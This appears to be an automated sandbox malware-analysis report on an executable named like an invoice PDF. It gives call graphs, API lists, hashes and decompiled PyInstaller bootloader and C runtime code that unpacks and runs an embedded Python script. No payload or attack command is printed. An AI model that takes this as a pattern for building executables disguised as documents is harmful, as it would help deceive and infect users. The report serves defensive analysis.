calls 23273->23277 23274->23245 23275->23264 23275->23271 23277->23278 23319 132836e 23278->23319 23280 1327d91 23279->23280 23281 1327e7a 23279->23281 23282 1327da2 23280->23282 23284 13209eb _free 20 API calls 23280->23284 23281->23256 23283 1327db4 23282->23283 23285 13209eb _free 20 API calls 23282->23285 23286 1327dc6 23283->23286 23287 13209eb _free 20 API calls 23283->23287 23284->23282 23285->23283 23288 1327dd8 23286->23288 23289 13209eb _free 20 API calls 23286->23289 23287->23286 23290 1327dea 23288->23290 23292 13209eb _free 20 API calls 23288->23292 23289->23288 23291 1327dfc 23290->23291 23293 13209eb _free 20 API calls 23290->23293 23294 1327e0e 23291->23294 23295 13209eb _free 20 API calls 23291->23295 23292->23290 23293->23291 23296 1327e20 23294->23296 23297 13209eb _free 20 API calls 23294->23297 23295->23294 23298 1327e32 23296->23298 23300 13209eb _free 20 API calls 23296->23300 23297->23296 23299 1327e44 23298->23299 23301 13209eb _free 20 API calls 23298->23301 23302 1327e56 23299->23302 23303 13209eb _free 20 API calls 23299->23303 23300->23298 23301->23299 23304 1327e68 23302->23304 23305 13209eb _free 20 API calls 23302->23305 23303->23302 23304->23281 23306 13209eb _free 20 API calls 23304->23306 23305->23304 23306->23281 23308 1327ee3 23307->23308 23309 1327e8b 23307->23309 23308->23258 23310 1327e9b 23309->23310 23311 13209eb _free 20 API calls 23309->23311 23312 1327ead 23310->23312 23313 13209eb _free 20 API calls 23310->23313 23311->23310 23314 1327ebf 23312->23314 23315 13209eb _free 20 API calls 23312->23315 23313->23312 23316 1327ed1 23314->23316 23317 13209eb _free 20 API calls 23314->23317 23315->23314 23316->23308 23318 13209eb _free 20 API calls 23316->23318 23317->23316 23318->23308 23320 1328399 23319->23320 23321 132837b 23319->23321 23320->23275 23321->23320 23325 1327f23 23321->23325 23324 13209eb _free 20 API calls 23324->23320 23326 1328001 23325->23326 23327 1327f34 23325->23327 23326->23324 23361 1327ee7 23327->23361 23330 1327ee7 __fassign 20 API calls 23331 1327f47 23330->23331 23332 1327ee7 __fassign 20 API calls 23331->23332 23333 1327f52 23332->23333 23334 1327ee7 __fassign 20 API calls 23333->23334 23335 1327f5d 23334->23335 23336 1327ee7 __fassign 20 API calls 23335->23336 23337 1327f6b 23336->23337 23338 13209eb _free 20 API calls 23337->23338 23339 1327f76 23338->23339 23340 13209eb _free 20 API calls 23339->23340 23341 1327f81 23340->23341 23342 13209eb _free 20 API calls 23341->23342 23343 1327f8c 23342->23343 23344 1327ee7 __fassign 20 API calls 23343->23344 23345 1327f9a 23344->23345 23346 1327ee7 __fassign 20 API calls 23345->23346 23347 1327fa8 23346->23347 23348 1327ee7 __fassign 20 API calls 23347->23348 23349 1327fb9 23348->23349 23350 1327ee7 __fassign 20 API calls 23349->23350 23351 1327fc7 23350->23351 23352 1327ee7 __fassign 20 API calls 23351->23352 23353 1327fd5 23352->23353 23354 13209eb _free 20 API calls 23353->23354 23355 1327fe0 23354->23355 23356 13209eb _free 20 API calls 23355->23356 23362 1327f1e 23361->23362 23363 1327f0e 23361->23363 23362->23330 23363->23362 23364 13209eb _free 20 API calls 23363->23364 23364->23363 23365->23250 21664 13224dd 21665 13224ea 21664->21665 21669 1322502 21664->21669 21666 131c9ce __dosmaperr 20 API calls 21665->21666 21667 13224ef 21666->21667 21668 1321788 __cftof 26 API calls 21667->21668 21678 13224fa 21668->21678 21670 132255d 21669->21670 21669->21678 21684 1328dc7 21669->21684 21671 13209c5 __fread_nolock 26 API calls 21670->21671 21673 1322575 21671->21673 21689 1322015 21673->21689 21675 132257c 21676 13209c5 __fread_nolock 26 API calls 21675->21676 21675->21678 21677 13225a8 21676->21677 21677->21678 21679 13209c5 __fread_nolock 26 API calls 21677->21679 21680 13225b6 21679->21680 21680->21678 21681 13209c5 __fread_nolock 26 API calls 21680->21681 21682 13225c6 21681->21682 21683 13209c5 __fread_nolock 26 API calls 21682->21683 21683->21678 21685 1320a25 __fread_nolock 21 API calls 21684->21685 21686 1328de2 21685->21686 21687 13209eb _free 20 API calls 21686->21687 21688 1328dec 21687->21688 21688->21670 21690 1322021 ___scrt_is_nonwritable_in_current_image 21689->21690 21691 1322041 21690->21691 21692 1322029 21690->21692 21694 1322107 21691->21694 21699 132207a 21691->21699 21693 131c9bb __dosmaperr 20 API calls 21692->21693 21696 132202e 21693->21696 21695 131c9bb __dosmaperr 20 API calls 21694->21695 21697 132210c 21695->21697 21698 131c9ce __dosmaperr 20 API calls 21696->21698 21702 131c9ce __dosmaperr 20 API calls 21697->21702 21712 1322036 ___scrt_is_nonwritable_in_current_image 21698->21712 21700 1322089 21699->21700 21701 132209e 21699->21701 21703 131c9bb __dosmaperr 20 API calls 21700->21703 21719 131e6a9 EnterCriticalSection 21701->21719 21705 1322096 21702->21705 21706 132208e 21703->21706 21711 1321788 __cftof 26 API calls 21705->21711 21708 131c9ce __dosmaperr 20 API calls 21706->21708 21707 13220a4 21709 13220c0 21707->21709 21710 13220d5 21707->21710 21708->21705 21713 131c9ce __dosmaperr 20 API calls 21709->21713 21714 1322128 __fread_nolock 38 API calls 21710->21714 21711->21712 21712->21675 21715 13220c5 21713->21715 21716 13220d0 21714->21716 21717 131c9bb __dosmaperr 20 API calls 21715->21717 21720 13220ff 21716->21720 21717->21716 21719->21707 21723 131e760 LeaveCriticalSection 21720->21723 21722 1322105 21722->21712 21723->21722

                            Executed Functions

                            Function 01313230, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 105COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PyUnicode_Decode.PYTHON38(00003068,00003069,utf-8,strict,00000000,00000000,01312044,00000000,00000000,00000000,?,?,?,00000000), ref: 01313256
                            • PySys_SetObject.PYTHON38(_MEIPASS,00000000,?), ref: 0131327D
                            • PyImport_ImportModule.PYTHON38(marshal), ref: 01313288
                            • PyModule_GetDict.PYTHON38(00000000), ref: 0131328F
                            • PyDict_GetItemString.PYTHON38(00000000,loads), ref: 0131329B
                            • htonl.WS2_32(?), ref: 013132DC
                            • htonl.WS2_32(?), ref: 013132EA
                            • PyObject_CallFunction.PYTHON38(00000000,01331604,0000000C,-0000000C,?,?,00000000), ref: 013132FD
                            • PyImport_ExecCodeModule.PYTHON38(?,00000000), ref: 0131330F
                            • PyErr_Occurred.PYTHON38 ref: 0131332D
                            • PyErr_Print.PYTHON38 ref: 01313337
                            • PyErr_Clear.PYTHON38 ref: 0131333D
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Err_$Import_Modulehtonl$CallClearCodeDecodeDictDict_ExecFunctionImportItemModule_ObjectObject_OccurredPrintStringSys_Unicode_
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 3206803411-3336796446
                            • Opcode ID: 74c7c2ff91bf46968467128c39aa066c5e73737dac1ee2d2916ad24649f5298b
                            • Instruction ID: 379d61f6f502944b680c6947874db1f3651a7cbf25e4b9a7339b936b3acfa379
                            • Opcode Fuzzy Hash: 74c7c2ff91bf46968467128c39aa066c5e73737dac1ee2d2916ad24649f5298b
                            • Instruction Fuzzy Hash: F5312B72500201BBD7283B7DAC098A77B6CBF4133DF094516F906E224AEA21E515C7A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01312210, Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 131COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PyImport_AddModule.PYTHON38(__main__,00000000,00000000,0131205E,00000000,?,?,00000000,00000000,?,?,?,00000000), ref: 01312239
                            • PyModule_GetDict.PYTHON38(00000000,?,?,?,00000000,00000000,?,?,?,00000000), ref: 01312272
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DictImport_ModuleModule_
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 1159605621-2368408649
                            • Opcode ID: 231b0f37b99116c8a8851db98945a2f391cb547835501a8a99fe405c05546fbc
                            • Instruction ID: fccee037749153ab15a95ea8f1cbbed93eb4b509910f58fd01782a4dfe3d8732
                            • Opcode Fuzzy Hash: 231b0f37b99116c8a8851db98945a2f391cb547835501a8a99fe405c05546fbc
                            • Instruction Fuzzy Hash: BD417CB2904241ABD7289B3DEC0599B7B9CBF8432DF080A26F819D1289E634D144C7A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311560, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 95COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
				void* _t14;
				signed int _t15;
				void* _t18;
				signed int _t19;
				void* _t20;
				signed int _t26;
				signed int _t28;
				void* _t31;
				void* _t32;
				signed int* _t33;
				void* _t35;
				void* _t36;

				_t32 = __edx;
				_t31 = __ecx;
				_t33 = _a4;
				if( *_t33 != 0) {
					L2:
					_t14 = E01311120(_t32, _t33);
					_t36 = _t35 + 4;
					_t48 = _t14 - 1;
					if(_t14 < 1) {
						E01319F16(_t32,  *_t33, 0, 2); // executed
						_t14 = E0131A488(_t32, _t48,  *_t33); // executed
						_t36 = _t36 + 0x10;
					}
					_t15 = E013113D0(_t32, _t33, _t14);
					if(_t15 == 0xffffffff) {
						goto L7;
					} else {
						_t3 =  &(_t33[9]); // 0x1
						_push( *_t3);
						_t33[0x101b] = 0;
						L01317864();
						_push(0);
						 *0x133c954 = _t15;
						_t5 =  &(_t33[7]); // 0xc0335f00
						L01317864();
						_t6 =  &(_t33[1]); // 0x1a74c085
						_t18 = E01319F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
						_t7 =  &(_t33[8]); // 0xb85fc35b
						_push( *_t7);
						L01317864();
						_push(_t18);
						_t19 = E01319808(_t31);
						_t33[2] = _t19;
						_t50 = _t19;
						if(_t19 != 0) {
							_push( *_t33);
							_t9 =  &(_t33[8]); // 0xb85fc35b
							L01317864();
							_t10 =  &(_t33[2]); // 0xc085078b, executed
							_t20 = E01319B2B( *_t10, _t19,  *_t9, 1); // executed
							__eflags = _t20 - 1;
							if(__eflags >= 0) {
								_t11 =  &(_t33[8]); // 0xb85fc35b
								_push( *_t11);
								L01317864();
								_t12 =  &(_t33[2]); // 0xc085078b
								_t33[3] = _t20 +  *_t12;
								__eflags = E01319934( *_t33);
								if(__eflags == 0) {
									E01311200(_t33);
									__eflags = 0;
									return 0;
								} else {
									_push("Error on file\n.");
									_t26 = E01311910(__eflags) | 0xffffffff;
									__eflags = _t26;
									return _t26;
								}
							} else {
								_push("Could not read from file.");
								_push("fread");
								_t28 = E013117B0(__eflags) | 0xffffffff;
								__eflags = _t28;
								return _t28;
							}
						} else {
							_push("Could not allocate buffer for TOC.");
							_push("malloc");
							_t15 = E013117B0(_t50);
							goto L7;
						}
					}
				} else {
					_t2 =  &(_t33[0x1a]); // 0x131176c
					_t15 = E013128C0(_t2, "rb");
					_t35 = _t35 + 8;
					 *_t33 = _t15;
					if(_t15 == 0) {
						L7:
						return _t15 | 0xffffffff;
					} else {
						goto L2;
					}
				}
			}















                            0x01311560
                            0x01311560
                            0x01311561
                            0x01311568
                            0x01311585
                            0x01311586
                            0x0131158b
                            0x0131158e
                            0x01311591
                            0x01311599
                            0x013115a0
                            0x013115a5
                            0x013115a5
                            0x013115aa
                            0x013115b5
                            0x00000000
                            0x013115b7
                            0x013115b7
                            0x013115b7
                            0x013115ba
                            0x013115c4
                            0x013115c9
                            0x013115cb
                            0x013115d0
                            0x013115d3
                            0x013115d8
                            0x013115de
                            0x013115e6
                            0x013115e6
                            0x013115e9
                            0x013115ee
                            0x013115ef
                            0x013115f7
                            0x013115fa
                            0x013115fc
                            0x01311615
                            0x01311619
                            0x0131161c
                            0x01311622
                            0x01311625
                            0x0131162d
                            0x01311630
                            0x01311649
                            0x01311649
                            0x0131164c
                            0x01311651
                            0x01311656
                            0x01311661
                            0x01311663
                            0x01311678
                            0x01311680
                            0x01311683
                            0x01311665
                            0x01311665
                            0x01311672
                            0x01311672
                            0x01311676
                            0x01311676
                            0x01311632
                            0x01311632
                            0x01311637
                            0x01311644
                            0x01311644
                            0x01311648
                            0x01311648
                            0x013115fe
                            0x013115fe
                            0x01311603
                            0x01311608
                            0x00000000
                            0x0131160d
                            0x013115fc
                            0x0131156a
                            0x0131156a
                            0x01311573
                            0x01311578
                            0x0131157b
                            0x0131157f
                            0x01311610
                            0x01311614
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131157f

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction ID: fd9acf414977476da447cc55108fdcd8394025dc1c065c84879d1fbc300c5adf
                            • Opcode Fuzzy Hash: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction Fuzzy Hash: 4B21FDB1840702B7DA293B3DEC01B9B7AD5AF2026DF080D28F9D9913A9F763D5508A55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01322128, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 111 1322128-1322138 112 1322152-1322154 111->112 113 132213a-132214d call 131c9bb call 131c9ce 111->113 115 132215a-1322160 112->115 116 13224bc-13224c9 call 131c9bb call 131c9ce 112->116 130 13224d4 113->130 115->116 117 1322166-1322191 115->117 132 13224cf call 1321788 116->132 117->116 120 1322197-13221a0 117->120 123 13221a2-13221b5 call 131c9bb call 131c9ce 120->123 124 13221ba-13221bc 120->124 123->132 128 13221c2-13221c6 124->128 129 13224b8-13224ba 124->129 128->129 135 13221cc-13221d0 128->135 133 13224d7-13224dc 129->133 130->133 132->130 135->123 138 13221d2-13221e9 135->138 140 1322206-132220f 138->140 141 13221eb-13221ee 138->141 144 1322211-1322228 call 131c9bb call 131c9ce call 1321788 140->144 145 132222d-1322237 140->145 142 13221f0-13221f6 141->142 143 13221f8-1322201 141->143 142->143 142->144 149 13222a2-13222bc 143->149 174 13223ef 144->174 147 1322239-132223b 145->147 148 132223e-132225c call 1320a25 call 13209eb * 2 145->148 147->148 184 1322279-132229f call 1322807 148->184 185 132225e-1322274 call 131c9ce call 131c9bb 148->185 151 13222c2-13222d2 149->151 152 1322390-1322399 call 1328d71 149->152 151->152 156 13222d8-13222da 151->156 163 132239b-13223ad 152->163 164 132240c 152->164 156->152 160 13222e0-1322306 156->160 160->152 165 132230c-132231f 160->165 163->164 169 13223af-13223be GetConsoleMode 163->169 167 1322410-1322428 ReadFile 164->167 165->152 170 1322321-1322323 165->170 172 1322484-132248f GetLastError 167->172 173 132242a-1322430 167->173 169->164 175 13223c0-13223c4 169->175 170->152 176 1322325-1322350 170->176 178 1322491-13224a3 call 131c9ce call 131c9bb 172->178 179 13224a8-13224ab 172->179 173->172 180 1322432 173->180 182 13223f2-13223fc call 13209eb 174->182 175->167 181 13223c6-13223e0 ReadConsoleW 175->181 176->152 183 1322352-1322365 176->183 178->174 192 13224b1-13224b3 179->192 193 13223e8-13223ee call 131c998 179->193 188 1322435-1322447 180->188 190 13223e2 GetLastError 181->190 191 1322401-132240a 181->191 182->133 183->152 195 1322367-1322369 183->195 184->149 185->174 188->182 199 1322449-132244d 188->199 190->193 191->188 192->182 193->174 195->152 196 132236b-132238b 195->196 196->152 205 1322466-1322471 199->205 206 132244f-132245f call 1321e42 199->206 211 1322473 call 1321f94 205->211 212 132247d-1322482 call 1321c82 205->212 217 1322462-1322464 206->217 218 1322478-132247b 211->218 212->218 217->182 218->217
                            C-Code - Quality: 77%
                            			E01322128(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0131C9BB();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0131C9CE())) = 9;
						L59:
						_t145 = E01321788();
						goto L60;
					}
					__eflags = _t213 -  *0x1346308; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E01320A25(_t224, _t158);
								E013209EB(0);
								E013209EB(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E01322807(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E01328D71(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0131C998(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0131C9CE())) = 9;
											 *(E0131C9BB()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E01321C82();
												} else {
													_t176 = E01321F94();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E01321E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t104 =  &_v28; // 0xa
									_t231 =  *_t104;
									_t178 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0131C9CE())) = 0xc;
									 *(E0131C9BB()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E013209EB(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0131C9BB()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0131C9CE())) = 0x16;
							E01321788();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0131C9BB()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					goto L59;
				} else {
					 *(E0131C9BB()) =  *_t212 & 0x00000000;
					_t145 = E0131C9CE();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                            0x01322131
                            0x01322138
                            0x01322152
                            0x01322154
                            0x013224bc
                            0x013224bc
                            0x013224c1
                            0x013224c1
                            0x013224c9
                            0x013224cf
                            0x013224cf
                            0x00000000
                            0x013224cf
                            0x0132215a
                            0x01322160
                            0x00000000
                            0x00000000
                            0x01322168
                            0x01322174
                            0x01322177
                            0x0132217a
                            0x0132217d
                            0x01322184
                            0x01322187
                            0x0132218b
                            0x0132218e
                            0x01322191
                            0x00000000
                            0x00000000
                            0x01322197
                            0x0132219a
                            0x013221a0
                            0x013221ba
                            0x013221bc
                            0x013224b8
                            0x00000000
                            0x013224b8
                            0x013221c2
                            0x013221c6
                            0x00000000
                            0x00000000
                            0x013221cc
                            0x013221d0
                            0x00000000
                            0x00000000
                            0x013221d7
                            0x013221db
                            0x013221de
                            0x013221e1
                            0x013221e6
                            0x013221e6
                            0x013221e9
                            0x01322206
                            0x0132220b
                            0x0132220d
                            0x0132220f
                            0x0132222f
                            0x01322230
                            0x01322232
                            0x01322235
                            0x01322237
                            0x01322239
                            0x0132223b
                            0x0132223b
                            0x01322246
                            0x01322248
                            0x0132224f
                            0x01322254
                            0x01322257
                            0x0132225a
                            0x0132225c
                            0x01322281
                            0x01322286
                            0x0132228d
                            0x01322290
                            0x01322293
                            0x01322297
                            0x01322299
                            0x0132229d
                            0x0132229f
                            0x013222a2
                            0x013222a5
                            0x013222a7
                            0x013222aa
                            0x013222b1
                            0x013222b4
                            0x013222b9
                            0x013222bc
                            0x013222c5
                            0x013222c9
                            0x013222cc
                            0x013222cf
                            0x013222d2
                            0x013222d8
                            0x013222da
                            0x013222e3
                            0x013222e6
                            0x013222e9
                            0x013222ec
                            0x013222ed
                            0x013222f1
                            0x013222f7
                            0x01322301
                            0x01322306
                            0x01322316
                            0x0132231a
                            0x0132231d
                            0x0132231f
                            0x01322321
                            0x01322323
                            0x01322325
                            0x0132232d
                            0x0132232e
                            0x01322331
                            0x01322334
                            0x01322335
                            0x0132233b
                            0x01322345
                            0x0132234d
                            0x01322350
                            0x0132235c
                            0x01322360
                            0x01322363
                            0x01322365
                            0x01322367
                            0x01322369
                            0x0132236b
                            0x01322373
                            0x01322374
                            0x01322377
                            0x0132237a
                            0x0132237a
                            0x0132237b
                            0x01322381
                            0x0132238b
                            0x0132238b
                            0x01322369
                            0x01322365
                            0x01322350
                            0x01322323
                            0x0132231f
                            0x01322306
                            0x013222da
                            0x013222d2
                            0x01322391
                            0x01322397
                            0x01322399
                            0x0132240c
                            0x0132240c
                            0x01322410
                            0x01322420
                            0x01322426
                            0x01322428
                            0x01322484
                            0x01322484
                            0x0132248c
                            0x0132248d
                            0x0132248f
                            0x013224a8
                            0x013224ab
                            0x013223e8
                            0x013223e9
                            0x00000000
                            0x013223ee
                            0x013224b1
                            0x00000000
                            0x013224b1
                            0x01322496
                            0x013224a1
                            0x00000000
                            0x013224a1
                            0x0132242a
                            0x0132242d
                            0x01322430
